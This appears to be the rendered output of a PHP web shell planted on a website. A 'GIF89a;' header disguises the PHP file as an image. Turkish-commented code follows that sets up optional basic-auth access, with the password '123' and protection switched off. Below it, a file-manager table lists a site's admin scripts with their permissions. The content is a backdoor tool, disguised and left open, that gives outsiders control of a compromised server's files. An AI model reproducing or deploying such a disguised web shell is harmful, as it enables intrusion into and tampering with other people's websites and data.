GIF89a; # Konfigurasyon $sayfaSifreleme ='0'; # 1 acik , 0 kapali $kullaniciAdi = '123'; $sifre = '123'; # yetki kontrol fonksiyonu function yetkiKontrol($kullaniciAdi,$sifre) { if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") { header('WWW-Authenticate: Basic realm="x"'); die(header('HTTP/1.0 401 Unauthorized')); } } # Sayfa Sifreleme aciksa if($sayfaSifreleme =='1') { # Veri ve sifre kontrolu yetkiKontrol($kullaniciAdi,$sifre); } ?>
| Name | Size | Modified | Perms | Actions | |
|---|---|---|---|---|---|
| layout | --- | April 30 2025 14:03:02. | 0755 | ||
| blog.php | 13.42 KB | April 30 2025 14:03:02. | 0644 | ||
| category.php | 8.53 KB | April 30 2025 14:03:02. | 0644 | ||
| dashboard.php | 4.41 KB | April 30 2025 14:03:02. | 0644 | ||
| gallery.php | 9.05 KB | April 30 2025 14:03:02. | 0644 | ||
| getblog.php | 5.47 KB | April 30 2025 14:03:02. | 0644 | ||
| getcallback.php | 4.36 KB | April 30 2025 14:03:02. | 0644 | ||
| getenquiry.php | 4.49 KB | April 30 2025 14:03:02. | 0644 | ||
| getgallery.php | 4.61 KB | April 30 2025 14:03:02. | 0644 | ||
| getnewsletter.php | 4.18 KB | April 30 2025 14:03:02. | 0644 | ||
| getproduct.php | 5.01 KB | April 30 2025 14:03:02. | 0644 | ||
| login.php | 5.72 KB | April 30 2025 14:03:02. | 0644 | ||
| product.php | 15.14 KB | April 30 2025 14:03:02. | 0644 | ||
| profile.php | 11.40 KB | April 30 2025 14:03:02. | 0644 | ||
| subcategory.php | 9.46 KB | April 30 2025 14:03:02. | 0644 | ||
| testimonial.php | 12.82 KB | April 30 2025 14:03:02. | 0644 |